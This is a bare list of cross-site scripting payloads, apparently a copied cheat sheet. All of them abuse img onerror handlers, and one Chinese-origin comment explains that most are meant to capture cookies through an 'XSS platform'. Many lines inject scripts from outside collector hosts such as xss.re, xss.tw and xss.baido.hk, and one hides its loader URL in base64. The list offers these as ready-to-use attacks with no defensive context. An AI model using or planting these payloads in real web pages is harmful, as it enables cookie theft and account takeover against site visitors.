<img src='non-exist.jpg'onerror="alert('xss')">
<img src=# onerror=alert(123)>
<img src=# onerror=alert(document.cookie)>
The ones below use an XSS platform to capture cookies:
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
<img src="#">
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
<img src=x width="0" height="0"></img>
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>